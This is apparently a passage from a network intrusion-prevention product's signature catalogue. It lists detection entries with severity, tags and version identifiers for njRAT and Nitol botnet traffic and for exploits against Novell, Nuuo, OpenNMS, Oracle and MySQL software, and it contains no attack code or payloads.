Last changed: sgpkg-ips-1246-5242
Vulnerability: Botnet-Nitol
Description:
Back to top

Generic_CS-njRAT-Activity

About this situation: NJRat activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Botnet-njRAT
Description:
Back to top

Generic_CS-njRAT-CnC-Traffic

About this situation: njRAT malware CnC traffic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1782-5242
Description:
Back to top

Generic_CS-NJStar-Communicator-MiniSMTP-Server-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in NJStar Communicator's MiniSMTP Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, NJStar Communicator MiniSMTP, CVE2011, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-655-5211
Last changed: sgpkg-ips-655-5211
Vulnerability: NJStar-Communicator-MiniSMTP-Server-Buffer-Overflow
Description:
Back to top

Generic_CS-Njworm-CnC-Traffic

About this situation: Njworm malware CnC traffic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-597-5211
Description:
Back to top

Generic_CS-Novell-Distributed-Print-Services-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell Netware detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Novell NetWare, Any Hardware, CVE2006, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Novell-Distributed-Print-Services-Integer-Overflow
Description:
Back to top

Generic_CS-Novell-eDirectory-dhost-Httpstk-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell eDirectory detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Novell eDirectory, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Novell-eDirectory-dhost-Httpstk-Buffer-Overflow
Description:
Back to top

Generic_CS-Novell-eDirectory-NCP-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell eDirectory detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell eDirectory, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-506-5211
Last changed: sgpkg-ips-506-5211
Vulnerability: Novell-eDirectory-NCP-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Novell-eDirectory-NDS-Verb-0x01-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell eDirectory detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell eDirectory, CVE2009, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Novell-eDirectory-NDS-Verb-0x01-Integer-Overflow
Description:
Back to top

Generic_CS-Novell-File-Reporter-Agent-XML-Parsing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell File Management Suite detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell File Reporter, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Novell-File-Reporter-Agent-XML-Parsing-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Novell-File-Reporter-Vol-Tag-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell File Reporter detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell File Reporter, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-494-5211
Vulnerability: Novell-File-Reporter-Vol-Tag-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Novell-File-Reporter-Vol-Tag-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell File Reporter detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell File Reporter, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-486-5211
Last changed: sgpkg-ips-1345-5242
Vulnerability: Novell-File-Reporter-Vol-Tag-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Novell-Groupwise-Messenger-Memory-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Novell GroupWise Messenger detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell GroupWise Messenger, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-574-5211
Vulnerability: Novell-Groupwise-Messenger-Server-Process-Memory-Information-Disclosure
Description:
Back to top

Generic_CS-Novell-Groupwise-Messenger-Nmma.exe-Login-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Novell GroupWise Messenger detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell GroupWise Messenger, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-443-4219
Vulnerability: Novell-Groupwise-Messenger-Nmma.exe-Login-Memory-Corruption
Description:
Back to top

Generic_CS-Novell-NetIQ-Privileged-User-Manager-Eval-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in Novell Privileged User Manager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell Privileged User Manager, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-494-5211
Vulnerability: Novell-NetIQ-Privileged-User-Manager-Eval-Policy-Bypass
Description:
Back to top

Generic_CS-Novell-NetWare-AFP-Remote-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Novell Netware detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Novell NetWare, Any Hardware, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-567-5211
Vulnerability: Novell-NetWare-AFP-Remote-Denial-Of-Service
Description:
Back to top

Generic_CS-Novell-ZENworks-Configuration-Management-Directory-Traversal

About this situation: An attempt to exploit a Novell ZENworks Configuration Management Directory Traversal vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-705-5211
Vulnerability: Novell-ZENworks-Configuration-Management-Directory-Traversal
Description:
Back to top

Generic_CS-Novell-ZENworks-Configuration-Management-Preboot-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Novell ZENworks Configuration Management detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-578-5211
Vulnerability: Novell-ZENworks-Configuration-Management-Preboot-Directory-Traversal
Description:
Back to top

Generic_CS-Novell-ZENworks-Handheld-Management-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell ZENworks Handheld Management detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Handheld Management, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-754-5211
Vulnerability: Novell-ZENworks-Handheld-Management-Buffer-Overflow
Description:
Back to top

Generic_CS-Novell-ZENworks-Handheld-Management-Upload-Directory-Traversal

About this situation: Attempt to exploit buffer overflow vulnerability in Novell ZENworks Handheld Management was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Handheld Management, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: Novell-ZENworks-Handheld-Management-Upload-Directory-Traversal
Description:
Back to top

Generic_CS-Novell-ZENworks-Handheld-Management-Zfhipcnd.exe-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell ZENworks Handheld Management detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Novell ZENworks Handheld Management, CVE2010, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Novell-ZENworks-Handheld-Management-Zfhipcnd.exe-Buffer-Overflow
Description:
Back to top

Generic_CS-Novell-ZENworks-Preboot-Service-Code-Execution

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell ZENworks Configuration Management detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Desktop/Server Management, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-313-4219
Last changed: sgpkg-ips-313-4219
Vulnerability: Novell-ZENworks-Configuration-Management-Preboot-Service-Code-Execution
Description:
Back to top

Generic_CS-Novell-ZENworks-Preboot-Service-Opcode-4c-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell ZENworks Configuration Management detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-494-5211
Vulnerability: Novell-ZENworks-Preboot-Service-Opcode-4c-Buffer-Overflow
Description:
Back to top

Generic_CS-Novell-ZENworks-Preboot-Service-Opcode-6c-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell ZENworks Configuration Management detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-494-5211
Vulnerability: Novell-ZENworks-Preboot-Service-Opcode-6c-Buffer-Overflow
Description:
Back to top

Generic_CS-Novell-ZENworks-Remote-Management-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell ZENworks detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Desktop Management, CVE2005, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Novell-ZENworks-Remote-Management-Buffer-Overflow
Description:
Back to top

Generic_CS-Nuuo-CMS-Arbitrary-File-Download

About this situation: An attempt to exploit a vulnerability in Nuuo CMS detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Nuuo CMS, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1152-5242
Vulnerability: Nuuo-CMS-Arbitrary-File-Download
Description:
Back to top

Generic_CS-OPC-Systems-Denial-of-Service

About this situation: OPCSystems.net denial of service
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, OPC Systems, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-627-5211
Vulnerability: OPC-Systems-Denial-of-Service
Description:
Back to top

Generic_CS-OpenNMS-Rmi-Java-Object-Deserialization

About this situation: A vulnerability in OpenNMS
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, OpenNMS, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-829-5242
Last changed: sgpkg-ips-829-5242
Vulnerability: OpenNMS-Rmi-Java-Object-Deserialization
Description:
Back to top

Generic_CS-Optima-Apiftp-Server-Exe-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in Optima detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Optima, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: Optima-Apiftp-Server-Exe-Denial-of-Service
Description:
Back to top

Generic_CS-Oracle-Coherence-CVE-2020-14756-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle Coherence detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, Oracle Coherence, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Vulnerability: Oracle-Coherence-CVE-2020-14756-Insecure-Deserialization
Description:
Back to top

Generic_CS-Oracle-Create-Database-Link-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Database Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database Server, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-574-5211
Vulnerability: Oracle-Create-Database-Link-Buffer-Overflow
Description:
Back to top

Generic_CS-Oracle-Database-DBMS-Scheduler-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Oracle Application Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Application Server, Oracle Database Server, CVE2005, Any Operating System not specific, Oracle Application Server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-357-4219
Vulnerability: Oracle-Database-DBMS-Scheduler-Privilege-Escalation
Description:
Back to top

Generic_CS-Oracle-Database-InterMedia-DoS

About this situation: An attempt to exploit a vulnerability in Oracle Database detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Oracle Database Server, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: Oracle-Database-InterMedia-DoS
Description:
Back to top

Generic_CS-Oracle-Database-Server-DBMS-DCD-PUBLISH-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Oracle Database server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 9i, CVE2010, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-303-4219
Last changed: sgpkg-ips-303-4219
Vulnerability: Oracle-Database-Server-DBMS-CDC-PUBLISH-SQL-Injection
Description:
Back to top

Generic_CS-Oracle-Database-Server-MD2-SDO-Code-Size-BOF

About this situation: An attempt to exploit a vulnerability in Oracle Database Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, Any Operating System not specific, Oracle Database not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Oracle-Database-Server-MD2-SDO-Code-Size-BOF
Description:
Back to top

Generic_CS-Oracle-Database-Server-MD2-Validate-Geom-BOF

About this situation: An attempt to exploit a vulnerability in Oracle Database Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, Any Operating System not specific, Oracle Database not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Oracle-Database-Server-MD2-Validate-Geom-BOF
Description:
Back to top

Generic_CS-Oracle-Database-Server-Workspace-Manager-Multiple-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Oracle Database Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 9i, Oracle 10g, Oracle 11g, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-229-3038
Last changed: sgpkg-ips-534-5211
Vulnerability: Oracle-Database-Server-Workspace-Manager-Multiple-SQL-Injection
Description:
Back to top

Generic_CS-Oracle-Database-Server-XDB-Pitrig-truncate-Procedure-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Database Server detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle Database, Oracle Application Server, CVE2008, Any Operating System not specific, Oracle Database not specific, Oracle Application Server not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-141-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: TNS_Oracle-Database-Server-XDB-Pitrig_truncate-Procedure-Buffer-Overflow
Description:
Back to top

Generic_CS-Oracle-Database-SYS.OLAPIMPL-T-Package-ODCITABLESTART-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Oracle Database detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2008, Any Operating System not specific, Oracle Database not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-204-2032
Last changed: sgpkg-ips-760-5211
Vulnerability: Oracle-Database-SYS.OLAPIMPL_T-Package-ODCITABLESTART-Buffer-Overflow
Description:
Back to top

Generic_CS-Oracle-Database-TNS-Listener-Registration-Lack-Of-Authentication

About this situation: An attempt to exploit a vulnerability in Oracle Database 10g Release 2 detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 10g, Oracle 11g, CVE2012, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-453-4333
Last changed: sgpkg-ips-453-4333
Vulnerability: Oracle-Database-TNS-Listener-Service-Registration-Lack-Of-Authentication
Description:
Back to top

Generic_CS-Oracle-Database-XDB-Pitrig-dropmetadata-Procedure-BOF

About this situation: Detected an attempt to exploit a vulnerability in Oracle Database detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 10g, CVE2007, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-130-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-XDB-Pitrig-dropmetadata-Procedure-BOF
Description:
Back to top

Generic_CS-Oracle-GlassFish-Server-Authenticated-Code-Execution

About this situation: A vulnerability in Oracle GlassFish
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle GlassFish Server, CVE2011, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-429-4219
Vulnerability: GlassFish-Authenticated-Code-Execution
Description:
Back to top

Generic_CS-Oracle-GoldenGate-Manager-Command-Report-DoS

About this situation: An attempt to exploit a vulnerability in Oracle GoldenGate Manager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle GoldenGate Manager, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1138-5242
Vulnerability: Oracle-GoldenGate-Manager-Command-Report-DoS
Description:
Back to top

Generic_CS-Oracle-GoldenGate-Manager-Command-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle GoldenGate Manager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle GoldenGate Manager, CVE2018, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1608-5242
Vulnerability: Oracle-GoldenGate-Manager-Command-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Oracle-GoldenGate-Manager-Tab-Parsing-DoS

About this situation: An attempt to exploit a vulnerability in Oracle GoldenGate Manager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle GoldenGate Manager, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1138-5242
Last changed: sgpkg-ips-1138-5242
Vulnerability: Oracle-GoldenGate-Manager-Tab-Parsing-DoS
Description:
Back to top

Generic_CS-Oracle-GoldenGate-Message-Length

About this situation: Oracle GoldenGate Manager use detected
Context: TCP Client Stream Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Oracle GoldenGate Manager, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1138-5242
Last changed: sgpkg-ips-1588-5242
Description:
Back to top

Generic_CS-Oracle-MySQL-Cluster-Data-Node-GSN_cm_regref-Handling-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Oracle MySQL Cluster detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1440-5242
Last changed: sgpkg-ips-1440-5242
Vulnerability: Oracle-MySQL-Cluster-Data-Node-GSN_cm_regref-Handling-Remote-Code-Execution
Description:
Back to top

Generic_CS-Oracle-MySQL-Cluster-Data-Node-GSN_continueb-Handling-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Oracle MySQL Cluster detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle MySQL Cluster, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1521-5242
Vulnerability: Oracle-MySQL-Cluster-Data-Node-GSN_continueb-Handling-Remote-Code-Execution
Description:
Back to top

Generic_CS-Oracle-Mysql-Cluster-Data-Node-GSN_Processinfo_Rep-Handling-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Oracle MySQL Cluster detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1443-5242
Last changed: sgpkg-ips-1443-5242
Vulnerability: Oracle-MySQL-Cluster-Data-Node-GSN_Processinfo_Rep-Remote-Code-Execution
Description:
Back to top

Generic_CS-Oracle-MySQL-Cluster-Data-Node-GSN_Sync_path_req-Parsing-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in Oracle MySQL Cluster detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle MySQL Cluster, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1544-5242
Vulnerability: Oracle-MySQL-Cluster-Data-Node-GSN_Sync_path_req-Parsing-Integer-Underflow
Description:
Back to top

Generic_CS-Oracle-MySQL-Cluster-Data-Node-GSN_TRIG_ATTRINFO-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle MySQL detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle MySQL Cluster, CVE2021, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1439-5242
Last changed: sgpkg-ips-1439-5242
Vulnerability: Oracle-MySQL-Cluster-Data-Node-GSN_TRIG_ATTRINFO-Handling-Buffer-Overflow
Description:
Back to top

Generic_CS-Oracle-MySQL-Cluster-GSN_CREATE_FRAGMENTATION_REQ-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle MySQL Cluster detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle MySQL Cluster, CVE2022, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Vulnerability: Oracle-MySQL-Cluster-GSN_CREATE_FRAGMENTATION_REQ-Buffer-Overflow
Description:
Back to top

Generic_CS-Oracle-MySQL-Cluster-Management-API-dumpState-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle MySQL Cluster detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle MySQL Cluster, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1468-5242
Last changed: sgpkg-ips-1503-5242
Vulnerability: Oracle-MySQL-Cluster-Management-API-dumpState-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Oracle-MySQL-Cluster-Management-API-Report_Event-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle MySQL Cluster detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1452-5242
Last changed: sgpkg-ips-1452-5242
Vulnerability: Oracle-MySQL-Cluster-Management-API-Report_Event-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Oracle-MySQL-Cluster-Management-API-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle MySQL Cluster detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1433-5242
Last changed: sgpkg-ips-1433-5242
Vulnerability: Oracle-MySQL-Cluster-Management-API-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Oracle-MySQL-Server-Innodb-Memcached-Plugin-Get-Request-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle MySQL detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1427-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Oracle-MySQL-Server-Innodb-Memcached-Plugin-Get-Request-Buffer-Overflow
Description:
Back to top

